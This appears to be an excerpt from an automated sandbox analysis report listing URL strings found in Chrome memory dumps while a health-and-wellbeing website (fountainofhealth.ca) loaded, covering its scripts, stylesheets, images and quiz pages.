Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481637546.000028EC033B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320190791.000028EC06934000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/widgets/mouse-min.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/widgets/mouse-min.js?v=10.1.0.0
Source: chrome.exe, 00000000.00000002.2484044727.000028EC0367C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery/jq
Source: chrome.exe, 00000000.00000002.2484044727.000028EC0367C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery/jqery.minv=3.
Source: chrome.exe, 00000000.00000003.2342734816.000028EC063C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2342988019.000028EC063A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439458597.000001E4ACC57000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery/jquery.min.js?v=3.7.0
Source: chrome.exe, 00000000.00000002.2489657256.000028EC03E9C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495723401.000028EC04840000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/loadjs/loadjs.min.js?v=4.2.0
Source: chrome.exe, 00000000.00000002.2490296198.000028EC03F64000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320190791.000028EC06934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486226544.000028EC03934000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/tabbable/index.umd.min.js?v=6.1.2
Source: chrome.exe, 00000000.00000003.2314997569.000028EC051A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490153719.000028EC03F40000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315061036.000028EC05170000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/underscore/underscore-min.js?v=1.13.6
Source: chrome.exe, 00000000.00000003.2314997569.000028EC051A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315061036.000028EC05170000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315030779.000028EC05178000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/underscore/underscore-min.js?v=1.13.6a
Source: chrome.exe, 00000000.00000003.2314997569.000028EC051A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315061036.000028EC05170000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315030779.000028EC05178000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/underscore/underscore-min.js?v=1.13.6aDb
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2497831692.000028EC04E14000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/ajax.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/ajax.js?v=10.1.0sage.js?swjs7b
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472240524.000028EC0283C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/announce.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/debounce.js?v=10.1.0
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/debounce.js?v=10.1.0.js?v=4.2.0
Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2475340752.000028EC02C67000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.ajax.js?v=10.1.0
Source: chrome.exe, 00000000.00000003.2319531177.000028EC04D45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.ajax.js?v=10.1.0a
Source: chrome.exe, 00000000.00000003.2319531177.000028EC04D45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.ajax.js?v=10.1.0aDb
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/facebook-t.svg
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/facebook-t.svggdler
Source: chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488508263.000028EC03CD0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/facebook.svg
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/foh-logo%203.svg
Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/foh-logo%203.svgHandler
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-1-300_6.png
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-E-300_6.png
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-H-300_6.png
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-R-300_6.png
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-T-300_7.png
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485845268.000028EC0387C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icon-V-300_6.png
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icons8-download-40.png
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icons8-up-64.png
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/icons8-up-64.png(
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/leaves-banner-2_0_0.jpg
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/redirect%20icone%20.png
Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/redirect%20icone%20.png3
Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/twitter-t.svg
Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/twitter.svg
Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/twitter.svg.gif
Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/twitter.svgeHandlerjs
Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/wellness-app.gif
Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/wellness-app.gifd-2.jpg
Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/youtube-t.svg
Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/youtube.svg
Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/inline-images/youtube.svgg
Source: chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319699836.000028EC0490C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/sites/default/files/styles/slider1/public/2023-12/Group%209825%20%282%29
Source: chrome.exe, 00000000.00000002.2490296198.000028EC03F64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/t
Source: chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467653990.000028EC02270000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/th.ca/
Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484699862.000028EC03718000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/dialog.js?swjs7b
Source: chrome.exe, 00000000.00000002.2491036779.000028EC0402C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495335688.000028EC047D8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491256401.000028EC04045000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/drupal.bootstrap.js?swjs7b
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467653990.000028EC02270000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/ajax.js?swjs7b
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319699836.000028EC0490C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/message.js?swjs7b
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500311139.000028EC06614000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491141569.000028EC04034000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/progress.js?swjs7b
Source: chrome.exe, 00000000.00000003.2319331070.000028EC06828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/misc/progress.js?swjs7baDb
Source: chrome.exe, 00000000.00000002.2496387557.000028EC04944000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484699862.000028EC03718000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2491256401.000028EC04045000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b
Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/modal.js?swjs7b
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/css/img/icons8-search-28.png
Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/css/questionnaire.css?swjs7b
Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/css/questionnaire.css?swjs7btured-2.jpg
Source: chrome.exe, 00000000.00000002.2489880900.000028EC03EE0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7b
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/images/Testimonials/Aging_featured-2.jpg
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489590171.000028EC03E8C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/images/Testimonials/doctor-21.jpg
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/images/Testimonials/speakers-420.jpg
Source: chrome.exe, 00000000.00000003.2340828850.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495578930.000028EC04824000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/images/Testimonials/speakers-420.jpgjpg
Source: chrome.exe, 00000000.00000002.2491036779.000028EC0402C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496640859.000028EC04998000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/banner-slider.js?swjs7b
Source: chrome.exe, 00000000.00000002.2504370678.000028EC078C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/banner-slider.js?swjs7ba
Source: chrome.exe, 00000000.00000002.2504370678.000028EC078C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/banner-slider.js?swjs7baDb
Source: chrome.exe, 00000000.00000003.2371195957.000028EC04024000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/custom.js?swjs7b
Source: chrome.exe, 00000000.00000003.2371195957.000028EC04024000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/custom.js?swjs7b:491:6
Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2342988019.000028EC063A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/script.js?swjs7b
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive--quiz
Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive-c-approach-wellbeing
Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499781921.000028EC06410000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/additional-tools-and-links
